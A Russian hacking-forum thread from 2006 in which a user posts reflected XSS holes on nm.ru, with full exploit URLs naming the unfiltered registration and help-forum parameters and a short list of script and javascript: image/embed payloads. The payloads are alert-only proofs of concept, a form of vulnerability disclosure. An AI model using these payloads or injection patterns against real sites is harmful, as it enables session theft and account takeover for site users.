ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS на NM.ru
  #1  
Старый 26.04.2006, 21:31
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
Exclamation XSS на NM.ru

Не фильтруются: login, quest, answ.
Код:
_http://www.nm.ru/users/reg.dhtml?__post=1&login="><script>alert('XSS')%3B</script>&domain=newmail%2Eru&passwd=1&pass2=1&quest_helper=%C4%E0%F2%E0%20%F0%EE%E6%E4%E5%ED%E8%FF%20%C2%E0%F8%E5%E9%20%E1%E0%E1%F3%F8%EA%E8%3F&quest=1&answ=1
Не фильтруются: search, session_id.
И
Код:
_http://www.nm.ru/users/help/forum.dhtml?search="><script>alert('XSS')%3B</script>&session_id=1&fid=2.
__________________

Завтра будет.Лучше.

Последний раз редактировалось kot777; 27.04.2006 в 21:34.. Причина: добавил CODE чтобы не разъежались поля
 
Ответить с цитированием

  #2  
Старый 27.04.2006, 21:43
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

Вот еще несколько активных xss:
<script>alert(xss)</script>
<image src=javascript:alert(xss)>
<embed src=javascript:alert(xss);this.avi>
<img src=javascript:alert(xss)>


Отправляем в виде HTML.
__________________

Завтра будет.Лучше.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Админка для любителей Xss атак Jenizix Доступы, shells, ftp - Покупка, продажа 4 09.01.2007 10:46
Broken image, при использовании XSS через аватару Qwazar PHP, PERL, MySQL, JavaScript 8 15.04.2006 09:02
Xss в Nm Gho_st E-Mail 1 17.03.2006 21:10
Xss на yandex.ru Pridu_ROCK Уязвимости 1 04.03.2006 01:08
XSS в Phorum<=5.0.14 tester2005 Уязвимости 22 17.03.2005 07:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ